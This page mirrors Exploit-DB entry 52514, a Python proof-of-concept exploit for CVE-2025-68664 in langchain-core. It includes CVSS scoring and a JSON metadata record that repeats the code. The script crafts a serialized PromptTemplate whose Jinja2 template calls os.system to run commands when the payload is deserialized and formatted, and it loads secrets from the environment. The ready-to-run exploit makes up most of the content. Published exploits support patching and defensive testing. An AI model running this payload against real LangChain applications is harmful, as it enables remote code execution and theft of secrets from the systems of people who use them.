LangChain Core 1.2.4 – SSTI/RCE_EDB-ID:52514

9.3 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

Description

Exploit Title: LangChain Core - SSTI/RCE Date: 2025-12-29 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Contact: @banyamersecurity Instagram GitHub: https://github.com/mbanyamer Vendor Homepage: https://www.langchain.com/ Software...

Visit Original Source

Basic Information

ID EDB-ID:52514

Published Apr 29, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: LangChain Core - SSTI/RCE
# Date: 2025-12-29
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Contact: @banyamer_security (Instagram)
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.langchain.com/
# Software Link: https://pypi.org/project/langchain-core/
# Version: < 0.3.81 and < 1.2.5
# Tested on: Python 3.10 - 3.12
# CVE : CVE-2025-68664
# Description: Exploits unsafe deserialization in langchain_core.load to instantiate a malicious PromptTemplate
# with Jinja2 format, leading to Server-Side Template Injection and arbitrary command execution.

import os
from langchain_core.load import dumps, load
from langchain_core.prompts import PromptTemplate

# Set a dummy env var (demonstrates potential secret access if needed)
os.environ["TEST_SECRET"] = "secret_value_123"

# Malicious constructor payload targeting PromptTemplate with SSTI
payload = {
"exploit": {
"lc": 1,
"type": "constructor",
"id": ["langchain_core", "prompts", "prompt", "PromptTemplate"],
"kwargs": {
"input_variables": [],
"template": "{{ config.get('callbacks', {}).get('__builtins__', {}).get('__import__', lambda x: __import__(x))('os').system('id') }}",
"template_format": "jinja2"
}
}
}

# Serialize (dumps does not escape 'lc' key)
serialized = dumps(payload)

# Deserialize - instantiates the malicious PromptTemplate
deserialized = load(serialized, secrets_from_env=True)

# Extract and invoke the malicious prompt → triggers SSTI → RCE
malicious = deserialized["exploit"]
output = malicious.format()

print("[*] Command execution output:")
print(output)

{
    "lastseen": "2026-04-29T05:27:57",
    "description": "Exploit Title: LangChain Core - SSTI/RCE Date: 2025-12-29 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Contact: @banyamersecurity Instagram GitHub: https://github.com/mbanyamer Vendor Homepage: https://www.langchain.com/ Software...",
    "published": "2026-04-29T00:00:00",
    "modified": "2026-04-29T00:00:00",
    "type": "exploitdb",
    "title": "LangChain Core 1.2.4 - SSTI/RCE",
    "source": "",
    "references": "",
    "id": "EDB-ID:52514",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-68664"
    ],
    "sourceData": "# Exploit Title: LangChain Core - SSTI/RCE \r\n# Date: 2025-12-29\r\n# Exploit Author: Mohammed Idrees Banyamer\r\n# Author Country: Jordan\r\n# Contact: @banyamer_security (Instagram)\r\n# GitHub: https://github.com/mbanyamer\r\n# Vendor Homepage: https://www.langchain.com/\r\n# Software Link: https://pypi.org/project/langchain-core/\r\n# Version: < 0.3.81 and < 1.2.5\r\n# Tested on: Python 3.10 - 3.12\r\n# CVE : CVE-2025-68664\r\n# Description: Exploits unsafe deserialization in langchain_core.load to instantiate a malicious PromptTemplate\r\n#              with Jinja2 format, leading to Server-Side Template Injection and arbitrary command execution.\r\n\r\nimport os\r\nfrom langchain_core.load import dumps, load\r\nfrom langchain_core.prompts import PromptTemplate\r\n\r\n# Set a dummy env var (demonstrates potential secret access if needed)\r\nos.environ[\"TEST_SECRET\"] = \"secret_value_123\"\r\n\r\n# Malicious constructor payload targeting PromptTemplate with SSTI\r\npayload = {\r\n    \"exploit\": {\r\n        \"lc\": 1,\r\n        \"type\": \"constructor\",\r\n        \"id\": [\"langchain_core\", \"prompts\", \"prompt\", \"PromptTemplate\"],\r\n        \"kwargs\": {\r\n            \"input_variables\": [],\r\n            \"template\": \"{{ config.get('callbacks', {}).get('__builtins__', {}).get('__import__', lambda x: __import__(x))('os').system('id') }}\",\r\n            \"template_format\": \"jinja2\"\r\n        }\r\n    }\r\n}\r\n\r\n# Serialize (dumps does not escape 'lc' key)\r\nserialized = dumps(payload)\r\n\r\n# Deserialize - instantiates the malicious PromptTemplate\r\ndeserialized = load(serialized, secrets_from_env=True)\r\n\r\n# Extract and invoke the malicious prompt \u2192 triggers SSTI \u2192 RCE\r\nmalicious = deserialized[\"exploit\"]\r\noutput = malicious.format()\r\n\r\nprint(\"[*] Command execution output:\")\r\nprint(output)",
    "sourceHref": "https://www.exploit-db.com/raw/52514",
    "cvss": {
        "score": 9.3,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.exploit-db.com/exploits/52514",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply